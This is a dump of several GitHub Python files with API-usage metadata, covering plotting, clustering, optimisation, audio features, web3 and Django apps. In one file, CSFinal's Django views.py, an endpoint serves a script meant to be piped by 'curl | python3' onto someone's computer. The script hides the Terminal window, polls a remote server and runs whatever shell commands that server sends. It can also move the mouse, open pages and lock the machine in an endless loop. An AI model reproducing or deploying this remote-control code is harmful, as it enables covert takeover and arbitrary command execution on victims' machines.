norm=MidpointNormalize(midpoint=0.,vmin=-100, vmax=100))\n    \"\"\"\n    def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n        self.midpoint = midpoint\n        colors.Normalize.__init__(self, vmin, vmax, clip)\n\n    def __call__(self, value, clip=None):\n        \n        # I'm ignoring masked values and all kinds of edge cases to make a\n        # simple example...\n        x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n        return np.ma.masked_array(np.interp(value, x, y), np.isnan(value))\n", "repo_name": "ColeLab/DirectedActflow_release", "sub_path": "plotActivations.py", "file_name": "plotActivations.py", "file_ext": "py", "file_size_in_byte": 5747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.min", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"},
{"api_name": "numpy.asarray", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 96, "usage_type": "attribute"}, {"api_name": "matplotlib.colorbar.ColorbarBase", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.colorbar", "line_number": 104, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.colors", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.colors.Normalize.__init__", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 123, "usage_type": "attribute"}, {"api_name": "matplotlib.colors", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.ma.masked_array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "14715172233", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 31 22:20:41 2019\r\n\r\n@author: GANGADHAR\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nfrom sklearn.cluster import KMeans\r\nfrom scipy.spatial.distance import cdist\r\n\r\nflight=pd.read_excel('C:\\\\Users\\\\GANGADHAR\\\\Desktop\\\\sainath assignments\\\\Rcodes\\\\clustering\\\\flight.xlsx')\r\n\r\ndef norm_func(i):\r\n x=(i-i.min())/(i.max()-i.min())\r\n return(x)\r\n \r\ndf_norm=norm_func(flight.iloc[:,1:])\r\n\r\nk=list(range(10,20))\r\nk\r\nTWSS=[]\r\nfor i in k:\r\n kmeans = KMeans(n_clusters = i)\r\n kmeans.fit(df_norm)\r\n WSS = [] \r\n for j in range(i):\r\n WSS.append(sum(cdist(df_norm.iloc[kmeans.labels_==j,:],kmeans.cluster_centers_[j].reshape(1,df_norm.shape[1]),\"euclidean\")))\r\n TWSS.append(sum(WSS))\r\nTWSS\r\n\r\nplt.plot(k,TWSS, 'ro-');plt.xlabel('number of clusters');plt.ylabel('total within sum of squares');plt.xticks(k)\r\n \r\nmodel1=KMeans(n_clusters=14)\r\nmodel1.fit(df_norm)\r\n\r\nmodel1.cluster_centers_\r\nmodel1.labels_\r\nmodel=pd.Series(model1.labels_)\r\nmodel\r\nflight['clust']=model\r\n\r\n\r\n\r\nflightfinal=flight.iloc[:,[12,0,1,2,3,4,5,6,7,8,9,10,11]]\r\n\r\nfly=flight.iloc[:,1:13].groupby(flightfinal.clust).mean()\r\n\r\nflightfinal.to_csv(\"flightfinalkmewa.csv\",encoding=\"utf-8\")\r\n", "repo_name": "kpradyumna095/Clustering---Airline-Dataset-Using-Python", "sub_path": "EWAkmeans.py", "file_name": "EWAkmeans.py", "file_ext": "py", "file_size_in_byte": 1260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pylab.plot", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab.xticks", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "18023557420", "text": "import sys,os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom encapsulation.Golden_cut import golden_cut\nfrom encapsulation.Plot import plot\nfrom encapsulation.Stop_condition import stop_condition\nfrom encapsulation.test_function import f,x_0\n\nimport numpy as np\nfrom autograd import grad,hessian\n\ndef newton(f, x_0,eps=1e-3):\n k = 0 # 迭代次数\n condition = 1 # 结束迭代的条件\n x_list = [x_0]\n y_list = [f(x_0)]\n x = x_0\n n=len(x)\n while condition > eps:\n hessian_f = hessian(f)(x) # 黑塞矩阵\n grad_f = grad(f)(x)\n # 求特征值, 如果存在负特征值则给所有的特征值都加上一个mu\n sigma=np.linalg.eigvals(hessian_f)\n m=np.min(sigma)\n mu=0\n if m<0: mu=(-m)+1\n hessian_f+=(mu*np.identity(n))\n direction=np.linalg.inv(hessian_f)@grad_f\n def phi(step): return f(x-step*direction)\n step_best = golden_cut(phi, 0, 100, 1e-5)\n delta=step_best*direction\n condition=stop_condition(delta,x)\n x = x-delta\n x_list.append(x)\n y_list.append(f(x))\n k += 1\n print(\"Total iterations:\", k)\n return x_list,y_list\n\nx_list, y_list = newton(f, x_0, 1e-3)\nprint(x_list,y_list)\nplot(x_list, y_list, 2)", "repo_name": "baoduoxu/OptimizationAlgorithm", "sub_path": "unconstrained_optimization/second_order_method/newton_amend.py", "file_name": "newton_amend.py", "file_ext": "py", "file_size_in_byte": 1292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 14, "usage_type": "name"}, {"api_name": "encapsulation.test_function.f", "line_number": 15, "usage_type": "call"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 15, "usage_type": "argument"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 16, "usage_type": "name"}, {"api_name": "autograd.hessian", "line_number": 19, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 19, "usage_type": "argument"}, {"api_name": "autograd.grad", "line_number": 20, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 20, "usage_type": "argument"}, {"api_name": "numpy.linalg.eigvals", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 27, "usage_type": "attribute"}, {"api_name": "encapsulation.test_function.f", "line_number": 28, "usage_type": "call"}, {"api_name": "encapsulation.Golden_cut.golden_cut", "line_number": 29, "usage_type": "call"}, {"api_name": "encapsulation.Stop_condition.stop_condition", "line_number": 31, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 34, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 39, "usage_type": "argument"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 39, "usage_type": "argument"}, {"api_name": 
"encapsulation.Plot.plot", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "8204132060", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nimport sqlite3 \n# Create your views here.\n\n#RUN curl https://macnetback-nylr.c9users.io/getc | python3 to run on someone's computer \n\n# conn = sqlite3.connect(\"messages.db\")\n# c = conn.cursor()\n# c.execute(\"DROP TABLE saved\")\n# c.execute('''CREATE TABLE IF NOT EXISTS saved (content TEXT, type INTEGER, id INTEGER)''')\n# conn.commit()\n\nfrom django.views.decorators.csrf import csrf_exempt\n\ncurrent_position = []\nrequested_position = []\nuservolval = [0]\n\n@csrf_exempt \ndef messages(request):\n conn = sqlite3.connect(\"messages.db\")\n c = conn.cursor() \n if request.method == \"POST\": #posting from app\n data = request.POST[\"message\"]\n dtype = request.POST[\"type\"]\n did = request.POST[\"id\"]\n c.execute(\"DELETE FROM saved\")\n c.execute('''INSERT INTO saved VALUES (?, ?, ?)''', (data, dtype, did,))\n conn.commit() \n return HttpResponse(\"OK\")\n else: #reading from python script\n resp = []\n for element in c.execute(\"select content, type, id from saved\"):\n resp.append({\"message\": element[0], \"type\": element[1], \"id\": element[2]})\n return JsonResponse(resp, safe=False)\n c.close()\n \ndef requestPurge(request):\n conn = sqlite3.connect(\"messages.db\")\n c = conn.cursor() \n c.execute(\"DELETE FROM saved\")\n conn.commit()\n return HttpResponse(\"Done\")\n \n@csrf_exempt\ndef uservol(request): #get and post \n if request.method == \"POST\":\n uservolval[0] = request.POST[\"message\"]\n return HttpResponse(\"OK\")\n else:\n return HttpResponse(str(uservolval[0]))\n@csrf_exempt\ndef VolAndPos(request): #get and post \n if request.method == \"POST\":\n if request.POST[\"source\"] == \"mobile\":\n reqposdata = list(map(float, request.POST[\"message\"].split(\":\")))\n requested_position.append(reqposdata[0])\n requested_position.append(reqposdata[1])\n elif request.POST[\"source\"] == \"comp\":\n current_position[0] = request.POST[\"x\"]\n current_position[1] = request.POST[\"y\"]\n return HttpResponse(\"OK\")\n if request.method == \"GET\":\n if len(requested_position) > 0:\n data = [{\"x\": requested_position[0], \"y\": requested_position[1]}]\n del requested_position[0]\n del requested_position[0]\n print(requested_position)\n return JsonResponse(data, safe=False)\n else:\n return JsonResponse([], safe=False)\n \n@csrf_exempt \ndef getc(request):\n return HttpResponse(\"\"\"import os, sys\nimport time, requests, json\nimport subprocess \n\nos.system('''osascript -e 'tell application \"System Events\" to tell process \"Terminal\" to keystroke \"h\" using command down' ''')\n\nos.system(\"pip install pyautogui\")\nos.system(\"pip install pyobjc-core\")\nos.system(\"pip install pyobjc-framework-Quartz\")\n\nos.system(\"pip3 install pyautogui\")\nos.system(\"pip3 install pyobjc-core\")\nos.system(\"pip3 install pyobjc-framework-Quartz\") \n\n\n\nimport pyautogui as pg\n\nSIZE = pg.size()\nSIZEX = SIZE[0]\nSIZEY = SIZE[1]\n\ndef moveToLocation(x, y):\n\tpg.moveTo(x, y, 0.2)\n\n\ndef openURL(openurl):\n\tos.system('''osascript -e 'tell application \"Safari\" to activate' ''')\n\tos.system('''osascript -e 'tell application \"Safari\" to open location \"{}\"' '''.format(openurl))\n\ndef createAlert(text):\n\tos.system('''osascript -e 'tell application \"Finder\" to activate' ''')\n\tos.system('''osascript -e 'tell application \"Finder\" to display alert \"{}\"' '''.format(text))\n\ndef execute(cmd):\n\tos.system(cmd)\n\ndef 
cvol(newnum):\n\tos.system('''osascript -e 'set volume output volume {}' '''.format(newnum))\n\ndef getCurrent():\n\treturn str(pg.position())\n\ndef disableComputer():\n\t\tos.popen('''osascript -e 'repeat \n\t\t\t\t\t\ttell application \"Preview\" to activate \n\t\t\t\t\t\ttell application \"Safari\" to activate\n\t\t\t\t\t\ttell application \"Terminal\" to activate\n\t\t\t\t\tend repeat' ''')\n\ndef enableComputer():\n\tos.system(\"killall osascript\")\n\nwhile True:\n try:\n \ttime.sleep(0.01)\n \tr = requests.get(\"https://macnetback-nylr.c9users.io/\")\n \tr_mav = json.loads(requests.get(\"https://macnetback-nylr.c9users.io/volandpos\").text)\n \tr_vol = requests.get(\"https://macnetback-nylr.c9users.io/uvol\").text \n \tcvol(r_vol)\n \n \n \tif len(r_mav) > 0: #mouse related \n \t\tlocdata = r_mav[0]\n \t\tmoveToLocation(locdata[\"x\"]*SIZEX, locdata[\"y\"]*SIZEY)\n\n \ttry:\n \t\tdata = json.loads(r.text)[0]\n \texcept:\n \t\tcontinue\n \tmessageType = data[\"type\"]\n \tmessageDirections = data[\"message\"]\n \tmessageId = data[\"id\"]\n \n \tprint(r_mav)\n \tif messageType == 1: #open url \n \t\topenURL(messageDirections)\n \telif messageType == 2: #create alert \n \t\tcreateAlert(messageDirections)\n \telif messageType == 3: #execute\n \t\texecute(messageDirections)\n \telif messageType == 4: #volume related \n \t\tpass \n \telif messageType == 5:\n \t print(messageDirections)\n \t if messageDirections == \"true\":\n \t disableComputer()\n \t else:\n \t enableComputer()\n \telif messageType == 6:\n \t os.system(\"pmset displaysleepnow\")\n \trequests.get(\"https://macnetback-nylr.c9users.io/purge\")\n except Exception as e:\n print(str(e))\"\"\", content_type=\"text/plain\")\n\t\n", "repo_name": "ThanHuuTuan/CSFinal", "sub_path": "djangosrc/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 46, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 53, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "34192695671", "text": "import librosa\nimport librosa.display\nimport scipy.io.wavfile as wavf\nimport numpy as np\nimport wave\nimport soundfile as sf\nimport os, sys, csv, re\n\ndef extract_feature(X, sample_rate):\n #X, sample_rate = librosa.load(file_name)\n\n # sftf\n stft = np.abs(librosa.stft(X))\n\n # mfcc\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\n # chroma\n chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\n # melspectrogram\n mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\n # spectral contrast\n contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T,axis=0)\n\n tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T,axis=0)\n return mfccs,chroma,mel,contrast,tonnetz\n\ndef print_wave_info(file_name):\n wf = wave.open(file_name, \"r\")\n chan = wf.getnchannels()\n swidth = wf.getsampwidth()\n sfreq = wf.getframerate()\n nframes = wf.getnframes()\n params = wf.getparams()\n time = float(wf.getnframes()) / wf.getframerate()\n return chan,swidth,sfreq,nframes,params,time\n\n", "repo_name": "sayanmndl21/ssloc", "sub_path": "feature_extraction/fextract.py", "file_name": "fextract.py", "file_ext": "py", "file_size_in_byte": 1157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.abs", "line_number": 13, "usage_type": "call"}, {"api_name": "librosa.stft", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "call"}, {"api_name": "librosa.feature.mfcc", "line_number": 16, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "librosa.feature.chroma_stft", "line_number": 19, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "librosa.feature.spectral_contrast", "line_number": 25, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.feature.tonnetz", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 27, "usage_type": "attribute"}, {"api_name": "librosa.effects.harmonic", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "wave.open", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "3400862851", "text": "from django.http import StreamingHttpResponse\nfrom model.microexpression_recognition.demo import demo\nimport cv2\n\ndef expression_recognition(requests):\n def frame_generator():\n for frame in demo('model/microexpression_recognition/model', True):\n ret, jpeg = cv2.imencode('.jpg', frame)\n frame_data = jpeg.tobytes()\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_data + b'\\r\\n\\r\\n')\n return StreamingHttpResponse(frame_generator(),\n content_type='multipart/x-mixed-replace; boundary=frame')\n", "repo_name": "xueqili02/family-monitor-server", "sub_path": "microexpression/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.microexpression_recognition.demo.demo", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 8, "usage_type": "call"}, {"api_name": "django.http.StreamingHttpResponse", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "28138180859", "text": "# 4, 3, 1, 2, 5 기사 원하는 순서\n# 1, 2, 3, 4, 5 영수가 받는 순서\n# --------------\n# [3, 2, 1]\n# [4]\n# --------------\n# [2, 1]\n# [4, 3] 1을 실어야 되지만 2가 있어 여기서 stop -> result : 2\nfrom collections import deque\n\n\ndef solution(order):\n answer = 0\n l = len(order)\n boxes, order = deque([i for i in range(1, l+1)]), deque(order)\n tmp_boxes = []\n\n while boxes:\n now_box = boxes.popleft()\n # 지금 박스와 order[0] 같다면 popleft\n if now_box == order[0]:\n answer += 1\n order.popleft()\n if not boxes and tmp_boxes:\n boxes.append(tmp_boxes.pop())\n # 아니라면 임시 박스 우선 확인 후 여기도 없다면 넣음\n else:\n if tmp_boxes and tmp_boxes[-1] == order[0]:\n tmp_boxes.pop()\n order.popleft()\n boxes.appendleft(now_box)\n answer += 1\n else:\n tmp_boxes.append(now_box)\n\n return answer\n", "repo_name": "ggramgyo/PS_STUDY", "sub_path": "programmers/택배상자.py", "file_name": "택배상자.py", "file_ext": "py", "file_size_in_byte": 1030, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "2209031367", "text": "## You can use the web3.eth.getTransaction method to retrieve information about a specific transaction, and web3.eth.getBlock method to retrieve information about a specific block.\n## This code will retrieve the latest block number and then retrieve the last 10 blocks, checking each transaction in each block to see if it is related to your first wallet (either sending from or receiving to the wallet). \n## If it is, it will log the transaction details to the console.\n\nimport web3\n\nasync def monitor_transaction_history():\n w3 = web3.Web3(web3.HTTPProvider('https://mainnet.infura.io/v3/YOUR-PROJECT-ID'))\n latest_block = w3.eth.blockNumber\n print(f\"Latest block number: {latest_block}\")\n\n for i in range(latest_block, latest_block-10, -1):\n block = w3.eth.getBlock(i, True)\n\n for transaction in block['transactions']:\n if transaction['to'] == first_wallet_address or transaction['from'] == first_wallet_address:\n print(\"Transaction found:\")\n print(transaction)\n", "repo_name": "rockstarcoder333/Wallet_monitoring", "sub_path": "monitor_wallet_web3.py", "file_name": "monitor_wallet_web3.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "web3.Web3", "line_number": 8, "usage_type": "call"}, {"api_name": "web3.HTTPProvider", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "38728635449", "text": "import json\n\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.views.decorators.cache import cache_control\nfrom django.views.decorators.vary import vary_on_cookie\nfrom django.views.generic import DeleteView\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib import messages\nfrom django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.contrib.gis.utils import GeoIP\n\nfrom bootstrap.forms import BootstrapModelForm\n\nfrom traveldash.mine.models import Dashboard, DashboardRoute, City\nfrom traveldash.gtfs.models import Route, Stop\n\n\n@vary_on_cookie\ndef home(request):\n if request.user.is_authenticated():\n # if user is signed in, take them to their most recent\n # dashboard unless they have a referer (ie. they didn't type it)\n referer = request.META.get('HTTP_REFERER')\n # if we've never seen a referer from this user, then don't do a\n # redirect\n if (not referer) and request.session.get('seen_http_referer', False):\n dash_pk = request.session.get('td_last_dashboard')\n # fallback: dashboard list\n redirect = reverse('traveldash.mine.views.dashboard_list')\n if dash_pk:\n try:\n dashboard = Dashboard.objects.filter(user=request.user).get(pk=dash_pk)\n redirect = dashboard.get_absolute_url()\n except Dashboard.DoesNotExist:\n pass\n return HttpResponseRedirect(redirect)\n\n example_dashboard = Dashboard.objects.exclude(routes__isnull=True).order_by('?')[0]\n return TemplateResponse(request, \"mine/home.html\", {'example_dashboard': example_dashboard})\n\n\n@vary_on_cookie\ndef dashboard(request, pk):\n try:\n dashboard = Dashboard.objects.get(pk=pk)\n except Dashboard.DoesNotExist:\n raise Http404\n\n dashboard.touch()\n\n context = {\n 'dashboard': dashboard,\n 'is_owner': (dashboard.user == request.user),\n }\n if request.user == dashboard.user:\n request.session['td_last_dashboard'] = dashboard.pk\n return TemplateResponse(request, \"mine/dashboard.html\", context)\n\n\n@vary_on_cookie\n@cache_control(must_revalidate=True)\ndef dashboard_update(request, pk):\n try:\n dashboard = Dashboard.objects.get(pk=pk)\n except Dashboard.DoesNotExist:\n return HttpResponse(json.dumps({\"error\": \"dashboard-not-found\"}), status=404, content_type=\"application/json\")\n\n content = dashboard.as_json()\n return HttpResponse(json.dumps(content), content_type=\"application/json\")\n\n\n@login_required\ndef dashboard_list(request):\n c = {\n 'dashboard_list': Dashboard.objects.filter(user=request.user),\n 'base_url': request.build_absolute_uri('/')[:-1],\n }\n return TemplateResponse(request, \"mine/dashboard_list.html\", c)\n\n\nclass RouteForm(BootstrapModelForm):\n class Meta:\n model = DashboardRoute\n fields = ('id', 'from_stop', 'walk_time_start', 'to_stop', 'walk_time_end',)\n widgets = {\n 'from_stop': forms.TextInput(attrs={'class': 'gtfsStop'}),\n 'to_stop': forms.TextInput(attrs={'class': 'gtfsStop'}),\n }\n\n def clean(self):\n cd = self.cleaned_data\n if ('from_stop' in cd) and ('to_stop' in cd):\n if not Route.objects.between_stops(cd['from_stop'], cd['to_stop']).exists():\n raise forms.ValidationError(\"No Transport routes between the stops you've selected\")\n return cd\n\n def stop_json(self):\n return json.dumps({\n 'from_stop': 
self._stop_info(self['from_stop'].value()),\n 'to_stop': self._stop_info(self['to_stop'].value()),\n })\n\n def _stop_info(self, stop_id):\n if not stop_id:\n return None\n try:\n stop = Stop.objects.get(pk=stop_id)\n return {'id': stop.pk, 'name': stop.name, 'location': stop.location.tuple}\n except Stop.DoesNotExist:\n return None\n\nRouteFormSet = inlineformset_factory(Dashboard, DashboardRoute, form=RouteForm, extra=1)\n\n\nclass DashboardForm(BootstrapModelForm):\n class Meta:\n model = Dashboard\n exclude = ('user', 'last_viewed',)\n\n\n@login_required\ndef dashboard_create(request):\n if request.method == \"POST\":\n form = DashboardForm(request.POST)\n if form.is_valid():\n dashboard = form.save(commit=False)\n dashboard.user = request.user\n route_formset = RouteFormSet(request.POST, instance=dashboard)\n if route_formset.is_valid():\n dashboard.save()\n route_formset.save()\n messages.success(request, \"Created!\")\n return HttpResponseRedirect(dashboard.get_absolute_url())\n else:\n route_formset = RouteFormSet(instance=Dashboard())\n else:\n # try to find the best city match\n initial = {}\n if request.user.dashboards.exists():\n # Use existing city to start with\n initial['city'] = request.user.dashboards.all()[0].city\n else:\n # try a GeoIP lookup\n geoip = GeoIP().geos(request.META['REMOTE_ADDR'])\n if geoip:\n initial['city'] = City.objects.distance(geoip).order_by('-distance')[0]\n\n form = DashboardForm(initial=initial)\n route_formset = RouteFormSet(instance=Dashboard())\n\n context = {\n 'form': form,\n 'route_formset': route_formset,\n 'title': 'New Dashboard',\n 'stopFusionTableId': settings.GTFS_STOP_FUSION_TABLE_ID,\n 'city_data': json.dumps(City.objects.get_map_info()),\n }\n return TemplateResponse(request, \"mine/dashboard_form.html\", context)\n\n\n@login_required\ndef dashboard_edit(request, pk):\n try:\n dashboard = Dashboard.objects.filter(user=request.user).get(pk=pk)\n except Dashboard.DoesNotExist:\n raise Http404\n\n if request.method == \"POST\":\n form = DashboardForm(request.POST, instance=dashboard)\n if form.is_valid():\n form.save(commit=False)\n route_formset = RouteFormSet(request.POST, instance=dashboard)\n if route_formset.is_valid():\n dashboard.save()\n route_formset.save()\n\n if dashboard.routes.count() == 0:\n dashboard.delete()\n messages.success(request, \"Deleted empty dashboard\")\n return HttpResponseRedirect(reverse('traveldash.mine.views.dashboard_list'))\n else:\n messages.success(request, \"Saved\")\n return HttpResponseRedirect(dashboard.get_absolute_url())\n else:\n form = DashboardForm(instance=dashboard)\n route_formset = RouteFormSet(instance=dashboard)\n\n context = {\n 'form': form,\n 'route_formset': route_formset,\n 'title': 'Edit Dashboard',\n 'dashboard': dashboard,\n 'stopFusionTableId': settings.GTFS_STOP_FUSION_TABLE_ID,\n 'city_data': json.dumps(City.objects.get_map_info()),\n }\n return TemplateResponse(request, \"mine/dashboard_form.html\", context)\n\n\nclass DashboardDelete(DeleteView):\n context_object_name = \"dashboard\"\n\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(DashboardDelete, self).dispatch(*args, **kwargs)\n\n def get_queryset(self):\n return Dashboard.objects.filter(user=self.request.user)\n\n def get_success_url(self):\n return reverse('traveldash.mine.views.dashboard_list')\n", "repo_name": "rcoup/traveldash", "sub_path": "traveldash/mine/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7758, "program_lang": "python", "lang": 
